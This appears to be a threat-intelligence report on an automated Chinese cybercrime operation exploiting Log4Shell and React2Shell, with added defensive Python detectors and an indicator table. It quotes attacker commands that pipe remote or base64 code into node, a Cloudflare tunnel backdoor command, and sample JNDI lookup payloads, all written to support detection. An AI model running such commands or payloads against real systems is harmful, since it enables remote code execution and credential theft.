The Threat Research Team has identified a highly automated Chinese cybercrime infrastructure that blends large-scale exploitation with structured orchestration and monetization. This operation is coordinated through a centralized backend, codenamed “paperclip”, and an agent-based workflow system known as OpenClaw. Together, these components enable operators to manage campaigns through structured missions, transforming opportunistic exploitation into a disciplined cybercrime enterprise.
Targeting Strategy
The infrastructure leverages FOFA and 360Quake, two powerful cyberspace mapping engines commonly used by researchers, but here weaponized for reconnaissance. FOFA is employed to identify high-value organizations such as Web3 platforms, fintech services, and security vendors. Meanwhile, 360Quake focuses on technical fingerprinting of vulnerable services.
A notable tactic is the mass generation of FOFA accounts (e.g., fofa<random>@deltajohnsons[.]com), which bypasses API limits and sustains continuous scanning. This automation ensures uninterrupted reconnaissance, enabling attackers to maintain visibility across thousands of internet-facing assets.
Exploitation and Execution
The attackers deploy custom Python scripts (2.py, 3.py, 4.py, 11.py) to automate exploitation. These scripts run post-exploitation commands (such as environment-variable dumps), include WAF-bypass logic, and support parallel execution. Unlike opportunistic vulnerability scanning, the focus here is reliable remote code execution at scale.
Key exploits include:
- React2Shell (CVE-2025-55182, CVE-2025-66478)
- Log4Shell (CVE-2021-44228)
This combination allows attackers to compromise diverse targets, extract sensitive data, and validate stolen credentials in real time.
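The Log4Shell half of the exploit set is the one defenders can detect from request logs alone, because the trigger has to travel inside a header or parameter. The following is an added example (not the report's tooling) that scans constructed combined-format access log lines for `${jndi:` lookups, after collapsing the `${lower:…}` / `${…:-…}` wrappers and URL encoding that Log4j would resolve before performing the lookup. The log format, client addresses and `c2.example` hostnames are constructed sample data.

```python
"""Detection of Log4Shell (CVE-2021-44228) lookup strings in web access logs.
Added example for this page, not the report's own tooling. Sample lines are
constructed in the common combined log format."""
import re
from typing import Dict, List
from urllib.parse import unquote

# Wrappers that Log4j's lookup engine resolves before the JNDI lookup runs.
# Collapsing them first lets a single rule see through the usual obfuscations.
CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)   # ${lower:j} -> j
DEFAULT_WRAPPER = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")             # ${::-j}   -> j
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:", re.I
)
CLIENT_IP = re.compile(r"^(\S+) ")  # first field of a combined-format line

def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode (twice, for double-encoded requests) and strip wrappers
    repeatedly until the string stops changing or the round limit is hit."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        new = CASE_WRAPPER.sub(lambda m: m.group(1), text)
        new = DEFAULT_WRAPPER.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text

def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Return one hit per line that carries a JNDI lookup after normalization."""
    hits = []
    for line in lines:
        norm = normalize(line)
        m = JNDI_LOOKUP.search(norm)
        if m:
            ip = CLIENT_IP.match(line)
            hits.append({
                "client": ip.group(1) if ip else "?",
                "scheme": m.group(1).lower(),
                "normalized": norm[m.start():m.start() + 80],
            })
    return hits

# Constructed sample log: one benign request, three lookup attempts with
# increasing obfuscation, and one benign request that merely contains "${".
SAMPLE_LINES = [
    '10.0.0.5 - - [07/Apr/2026:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [07/Apr/2026:10:00:02 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://c2.example/a}"',
    '10.0.0.9 - - [07/Apr/2026:10:00:03 +0000] '
    '"GET /?x=${${lower:j}ndi:${lower:r}mi://c2.example/b} HTTP/1.1" 404 0 "-" "curl/8.0"',
    '10.0.0.9 - - [07/Apr/2026:10:00:04 +0000] '
    '"GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fc2.example%2Fc%7D HTTP/1.1" 404 0 "-" "curl/8.0"',
    '10.0.0.7 - - [07/Apr/2026:10:00:05 +0000] "GET /?q=${price} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_LINES):
        print(hit)
```

Normalizing before matching matters more than the exact scheme list: a rule that looks for the literal text `${jndi:` misses the third and fourth sample lines entirely, while the normalized form of all three attempts is identical. Feed the same function the request headers your proxy logs (User-Agent, X-Forwarded-For, Referer), since those are the fields most often used to carry the lookup.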
Credential Harvesting
Post-exploitation, the attackers prioritize runtime secrets over raw dumps. Environment variable extraction yields AI API keys, Stripe keys, database credentials, and tokens. These are parsed and stored centrally, ensuring immediate usability for monetization. This structured approach highlights a focus on direct financial gain rather than indiscriminate data theft.
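Because a single environment dump hands over every runtime secret at once, a defender's first question after a suspected compromise is which credentials were in that environment and in what order to rotate them. The block below is an added example (not the report's tooling) that inventories a process environment, classifies the variables that look like the secret types named above, and orders them for rotation. The `sk_live_`/`sk_test_` prefix is Stripe's documented secret-key format; the `sk-` prefix for AI-provider keys, the name-based heuristics and the priority table are assumptions made for this example, and the sample environment is constructed.

```python
"""Inventory of runtime secrets exposed through a process environment, used to
size the blast radius of an environment-variable dump and order rotation.
Added example for this page, not the report's tooling."""
import re
from typing import Dict, List, Optional, Tuple

# (category, pattern on the variable name or None, pattern on the value or None)
# The Stripe prefix is Stripe's documented format; the rest are assumptions.
SECRET_RULES: List[Tuple[str, Optional[re.Pattern], Optional[re.Pattern]]] = [
    ("stripe_secret_key", None, re.compile(r"^sk_(?:live|test)_[A-Za-z0-9]{8,}$")),
    ("ai_api_key", None, re.compile(r"^sk-[A-Za-z0-9_-]{20,}$")),
    ("database_url", None,
     re.compile(r"^(?:postgres(?:ql)?|mysql|mongodb(?:\+srv)?|redis)://[^:/@]+:[^@]+@", re.I)),
    ("generic_token", re.compile(r"TOKEN|SECRET|PASSWORD|PASSWD|API_KEY", re.I), None),
]

# Lower number = rotate first. Payment and database credentials convert to money
# or data immediately, which is what the report says the attackers test for.
ROTATION_PRIORITY: Dict[str, int] = {
    "stripe_secret_key": 1,
    "database_url": 1,
    "ai_api_key": 2,
    "generic_token": 3,
}

def classify(name: str, value: str) -> Optional[str]:
    """Return the secret category for one variable, or None if it looks benign.
    Value patterns are checked before name patterns so a Stripe key stored under
    an unusual name is still recognised as a Stripe key."""
    for category, name_rx, value_rx in SECRET_RULES:
        if value_rx is not None and value_rx.search(value):
            return category
        if name_rx is not None and name_rx.search(name) and value:
            return category
    return None

def redact(value: str) -> str:
    """Show just enough of a value to identify it; never log the secret itself."""
    return f"{value[:6]}...{value[-2:]}" if len(value) > 12 else "***"

def inventory(env: Dict[str, str]) -> List[Tuple[str, str, int]]:
    """Return (variable name, category, rotation priority) for every variable
    that looks like a secret, most urgent first. Values are never returned."""
    found = []
    for name, value in env.items():
        category = classify(name, value)
        if category:
            found.append((name, category, ROTATION_PRIORITY[category]))
    return sorted(found, key=lambda item: (item[2], item[0]))

# Constructed sample environment; none of these values is a real credential.
SAMPLE_ENV: Dict[str, str] = {
    "PATH": "/usr/bin:/bin",
    "NODE_ENV": "production",
    "STRIPE_SECRET_KEY": "sk_live_" + "EXAMPLE" + "0" * 10,
    "OPENAI_API_KEY": "sk-EXAMPLE" + "0" * 20,
    "DATABASE_URL": "postgres://app:s3cret@db.internal:5432/app",
    "SESSION_SECRET": "constructed-session-secret-value",
    "LOG_LEVEL": "info",
}

if __name__ == "__main__":
    for name, category, priority in inventory(SAMPLE_ENV):
        print(f"P{priority} {name:<20} {category:<18} {redact(SAMPLE_ENV[name])}")
```

Run it against `os.environ` of each service in an incident scope to produce the rotation list; running it in CI against deployment manifests shows, before any compromise, how many secrets would leave with one `env` dump and which ones could instead be fetched at runtime from a secrets manager and held only in memory.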
Persistence and Access
Persistence is achieved through multiple redundant mechanisms:
- Cloudflare tunnels (`cf-client --name sshd wss://*.trycloudflare.com/ws`)
- P2P clients (`p2p-client client --name mayun`)
- Backdoors (`d2`, `pl`)
The preference for lightweight backdoors over traditional webshells demonstrates an emphasis on stealth and scalability.
Advanced Fileless Loader
The attackers employ an NKN-based C2 deployment with fileless execution chains:
```
python3 2.py -w -c "curl https://soft-silence-*.workers.dev/ | node"
python3 2.py -w -c "echo <base64_payload> | node"
```
This technique minimizes forensic artifacts, complicating detection and response efforts.
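The commands quoted for persistence and for the fileless loader are short, but each leaves a distinctive process command line, which is the artifact to hunt for when nothing is written to disk. The following is an added example (not the report's tooling) of detection logic run over constructed process-execution telemetry: it flags the `cf-client` tunnel to `trycloudflare.com`, the `p2p-client` peer, the `curl … workers.dev | node` and `echo <base64> | node` loaders, and the `2.py … -c` exploit-script invocations named in this report, and decodes an inline base64 payload for the analyst without executing it. The log layout (timestamp, host, user, command line) and all sample values are constructed.

```python
"""Process-telemetry detection for the tradecraft quoted in this report.
Added example, not the report's tooling; the log format and the sample
values are constructed."""
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple

# Rules built from the command lines quoted in the report. Each is
# (rule name, compiled pattern applied to the process command line).
RULES: List[Tuple[str, re.Pattern]] = [
    # cf-client --name <svc> wss://<sub>.trycloudflare.com/ws : service exposed over a Cloudflare tunnel
    ("cloudflare_tunnel_client",
     re.compile(r"\bcf-client\b.*--name\s+\S+.*\bwss://\S*trycloudflare\.com", re.I)),
    # p2p-client client --name <peer> : peer-to-peer reverse-access client
    ("p2p_client_backdoor",
     re.compile(r"\bp2p-client\s+client\b", re.I)),
    # curl <workers.dev url> | node : remote script executed without touching disk
    ("remote_script_piped_to_node",
     re.compile(r"\bcurl\b[^|]*workers\.dev[^|]*\|\s*node\b", re.I)),
    # echo <base64> | node : inline payload executed without touching disk
    ("inline_base64_piped_to_node",
     re.compile(r"\becho\s+[A-Za-z0-9+/=]{20,}\s*\|\s*node\b")),
    # python3 2.py ... -c "<cmd>" : the exploit scripts named in the report
    ("exploit_script_remote_command",
     re.compile(r"\bpython3?\s+(?:\S*/)?(?:2|3|4|11)\.py\b.*\s-c\s", re.I)),
]

INLINE_PAYLOAD = re.compile(r"\becho\s+([A-Za-z0-9+/=]{20,})\s*\|\s*node\b")

def parse_line(line: str) -> Dict[str, str]:
    """Split a constructed 'timestamp host user command-line' record."""
    parts = line.split(" ", 3)
    if len(parts) != 4:
        raise ValueError(f"malformed telemetry line: {line!r}")
    ts, host, user, cmdline = parts
    return {"ts": ts, "host": host, "user": user, "cmdline": cmdline}

def match_rules(cmdline: str) -> List[str]:
    """Names of every rule that matches the command line, in rule order."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def decode_inline_payload(cmdline: str) -> Optional[str]:
    """If the command pipes an inline base64 blob to node, return the decoded
    text for review. Nothing is executed; invalid base64 yields None."""
    m = INLINE_PAYLOAD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def scan(log_text: str) -> List[Dict[str, object]]:
    """Return one alert per telemetry line that matches at least one rule."""
    alerts = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        hits = match_rules(rec["cmdline"])
        if hits:
            alerts.append({**rec, "rules": hits,
                           "decoded": decode_inline_payload(rec["cmdline"])})
    return alerts

# Constructed sample telemetry. The base64 blob decodes to a harmless string.
SAMPLE_LOG = """\
2026-04-07T10:01:02Z web01 www-data cf-client --name sshd wss://example-tunnel.trycloudflare.com/ws
2026-04-07T10:01:05Z web01 www-data p2p-client client --name mayun
2026-04-07T10:02:10Z web01 www-data python3 2.py -w -c "curl https://soft-silence-EXAMPLE.workers.dev/ | node"
2026-04-07T10:02:11Z web01 www-data python3 2.py -w -c "echo ZWNobyBoZWxsbyBmcm9tIHRlc3Q= | node"
2026-04-07T10:03:00Z web02 deploy node /srv/app/server.js
2026-04-07T10:03:30Z web02 deploy curl -s https://registry.npmjs.org/ -o /tmp/index.json
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["ts"], alert["host"], alert["user"], alert["rules"], alert["decoded"])
```

The two loader rules key on the pipe into `node` rather than on the hosting domain alone, so a benign `curl` to a package registry (last sample line) does not fire, while the `trycloudflare.com` and `workers.dev` matches remain the highest-signal items because neither should appear in a production web server's process tree. Wire the same rules into EDR or auditd `execve` telemetry, where the full command line is available.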
Orchestration Layer
The OpenClaw workflow interface provides human-in-the-loop orchestration. Observed UI stages include: Plan → Review → Dispatch → Recon → Scan → Validate → Report
This structured pipeline confirms that operators maintain oversight while leveraging automation for scale.
Monetization
Stolen data is enriched and monetized through blockchain intelligence APIs and Stripe validation. Cryptocurrency addresses are tracked across multiple chains using OKLink, OKX, and Tatum APIs, while stolen Stripe keys are tested for available balances. This enables immediate prioritization of high-value targets, ensuring efficient monetization.
Scale and Telemetry
Backend telemetry reveals the maturity of the operation:
- ~45,000 exploitation attempts logged
- 346 vulnerable hosts identified via React2Shell
- 3981 hosts with d2 backdoor
- 1393 hosts with pl backdoor
- 900 webshell implants
- 21,999 crypto addresses tracked
Execution telemetry is centrally logged in tables such as payload_exec_log, direct_payload_log, and clip_exec_log, providing operators with granular visibility into campaign success.
Conclusion
This infrastructure represents a paradigm shift in cybercrime operations. By integrating exploitation, credential harvesting, persistence, and monetization into a unified workflow, attackers achieve industrial-scale efficiency. Defensive strategies must evolve to detect not only exploitation attempts but also post-exploitation behaviors and monetization pipelines. The discovery of this infrastructure underscores a fundamental evolution in cybercrime: the transition from opportunistic exploitation to industrialized operations. What makes this case particularly alarming is the fusion of automation with human oversight. Unlike traditional botnets or opportunistic campaigns, the “paperclip” backend and OpenClaw workflow system demonstrate a corporate-style orchestration model, where exploitation, credential harvesting, and monetization are treated as structured business processes.
The reliance on FOFA and 360Quake for reconnaissance highlights how attackers weaponize legitimate research tools, blurring the line between security analysis and malicious activity. The preference for lightweight backdoors (d2 and pl) over webshells reflects a strategic emphasis on stealth, scalability, and persistence. Moreover, the monetization pipeline—integrating blockchain intelligence APIs and Stripe validation—shows that attackers are not merely stealing data but actively operationalizing financial fraud at scale. In our view, this case represents a wake-up call for defenders. Security teams must expand detection beyond initial exploitation to include post-exploitation telemetry, credential misuse, and monetization behaviors. The industrialization of cybercrime means that every compromised API key, Stripe credential, or crypto wallet is not just a data point—it is a direct financial asset in a global underground economy.
Indicators of Compromise (IOCs)
| Type | Indicator |
|---|---|
| Infrastructure IP address | 124[.]220[.]164[.]14 |
| Domain | kf[.]unpkg[.]top |
| Domain | anson-aeromarine-ocularly[.]ngrok-free[.]dev |
| Domain | soft-silence-d978[.]13544681192[.]workers[.]dev |
| URL | https[://]d6[.]tfdl[.]net/public/2026-04-07/a946d7de-2525-4189-bf4f-c3f4eec7a8ff/client.mjs |
| URL | https[://]d6[.]tfdl[.]net/public/2026-04-07/5777281b-9243-4169-8faa-af60d7904c01/cf-client |
| URL | https[://]d6[.]tfdl[.]net/public/2026-04-07/3d0d43d6-3b6d-44e6-bbff-2404f83a66b6/hybrid |
| URL | http[://]mainnet-seed-0004[.]nkn[.]org:30003 |
| URL | http[://]mainnet-seed-0012[.]nkn[.]org:30003 |
| URL | http[://]mainnet-seed-0020[.]nkn[.]org:30003 |
| Email | 13544681192[@]163[.]com |
| Email | d1rpt1xf[@]wegame[.]com |
| Email | fofa*[@]deltajohnsons[.]com |
| Exploit tooling | 2.py, 3.py, 4.py, 11.py, JNDIExploit-1.2-SNAPSHOT.jar |
